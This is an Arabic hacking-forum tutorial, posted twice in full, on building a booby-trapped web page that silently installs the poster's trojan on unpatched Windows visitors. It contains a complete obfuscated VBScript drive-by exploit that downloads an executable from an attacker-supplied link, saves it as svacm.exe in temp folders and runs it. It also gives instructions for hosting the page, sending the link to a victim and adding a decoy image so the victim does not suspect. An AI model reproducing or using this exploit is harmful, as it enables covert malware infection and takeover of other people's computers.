M.Bomb
10-20-2012, 01:21 PM
الســـــــلام عليــــــــــكم ورحـــــــــــمة الله وبـــــــــــركاته
اليوم اقدم لكم يا اعضاء منظمة جيوش الهكر الأعزاء
شرح كيفية تلغيم صفحة انترنت بباتش
صفحة الانترنت الملغمه بباتش ماتشتغل الا على ماسووا تحديثات للنظام
:eek: وبعض الثغرات تتخطى التحديثات بس ماتتخطى جميع التحديثات ونادرا تتخطى جميع التحديثات
فكرة الصفحه الملغمه بباتش : عباره عن صفحه مبرمجه بلغة html او php تضع بوسطها رابط باتشك المباشر واذا دخل اي واحد على الصفحه راح ينزل الباتش بجهازه ويشتغل بدون مايحس ..... وبكذا راح تخترقه..:biggrin:.
مثل: صفحه ملغمه بباتش وتكون فاضيه بيضا ..
ومثل : صفحه ملغمه بباتش وبوسطها صوره ( اذا فتح الضحيه الصفحه راح تطلع له الصوره ) ..(وهاي احسن وحدة عشان الضحية ما ايشك)...
.
.
.
اول خطوه نرفع الباتش على موقع رفع مباشر
ثانيا نفتح الثغره بالمفكره
بعدها نستبدل اللي موضح لنا برابط الباتش المرفوع
واذا كانت فيه صوره نحط رابط اي صوره تعجبك نستبدل هذا الرابط برابط الصوره
http://www.site.com/image.jpg (http://www.gophoto.it/view.php?i=http://www.site.com/image.jpg)
ونحفظها بصيغة html...
مثلا نكتب الاسم index.html
.
.
.
.
بعدها نرفع الصفحه الملغمه الى موقعك الخاص ونعطي الرابط الضحيه.....
نجرب الثغره :
<html>
<head>
<title>Exploit-Pro</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = document.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6
str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="هنا نضع برابط الباتش المرفوع "
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject" ,"")
if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
fname1= F.BuildPath(tmp,"\svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("****l.Application","")
Q.****lExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>
<head>
<img border="0" src=" برابط الصوره هنا نضع"
<hr>
<!-- **********location.href='http://google.com'</script> -->
</body>
</html>
ونحفظها بصيغة html
ونواصل كما في الشرح................................finish.
:wink:
ارجوا ان تستفيدوا من الموضوع ...
بالــــــــــــــــــــــ ــــــــــــتوفيق
اليوم اقدم لكم يا اعضاء منظمة جيوش الهكر الأعزاء
شرح كيفية تلغيم صفحة انترنت بباتش
صفحة الانترنت الملغمه بباتش ماتشتغل الا على ماسووا تحديثات للنظام
:eek: وبعض الثغرات تتخطى التحديثات بس ماتتخطى جميع التحديثات ونادرا تتخطى جميع التحديثات
فكرة الصفحه الملغمه بباتش : عباره عن صفحه مبرمجه بلغة html او php تضع بوسطها رابط باتشك المباشر واذا دخل اي واحد على الصفحه راح ينزل الباتش بجهازه ويشتغل بدون مايحس ..... وبكذا راح تخترقه..:biggrin:.
مثل: صفحه ملغمه بباتش وتكون فاضيه بيضا ..
ومثل : صفحه ملغمه بباتش وبوسطها صوره ( اذا فتح الضحيه الصفحه راح تطلع له الصوره ) ..(وهاي احسن وحدة عشان الضحية ما ايشك)...
.
.
.
اول خطوه نرفع الباتش على موقع رفع مباشر
ثانيا نفتح الثغره بالمفكره
بعدها نستبدل اللي موضح لنا برابط الباتش المرفوع
واذا كانت فيه صوره نحط رابط اي صوره تعجبك نستبدل هذا الرابط برابط الصوره
http://www.site.com/image.jpg (http://www.gophoto.it/view.php?i=http://www.site.com/image.jpg)
ونحفظها بصيغة html...
مثلا نكتب الاسم index.html
.
.
.
.
بعدها نرفع الصفحه الملغمه الى موقعك الخاص ونعطي الرابط الضحيه.....
نجرب الثغره :
<html>
<head>
<title>Exploit-Pro</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = document.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6
str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="هنا نضع برابط الباتش المرفوع "
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject" ,"")
if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
fname1= F.BuildPath(tmp,"\svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("****l.Application","")
Q.****lExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>
<head>
<img border="0" src=" برابط الصوره هنا نضع"
<hr>
<!-- **********location.href='http://google.com'</script> -->
</body>
</html>
ونحفظها بصيغة html
ونواصل كما في الشرح................................finish.
:wink:
ارجوا ان تستفيدوا من الموضوع ...
بالــــــــــــــــــــــ ــــــــــــتوفيق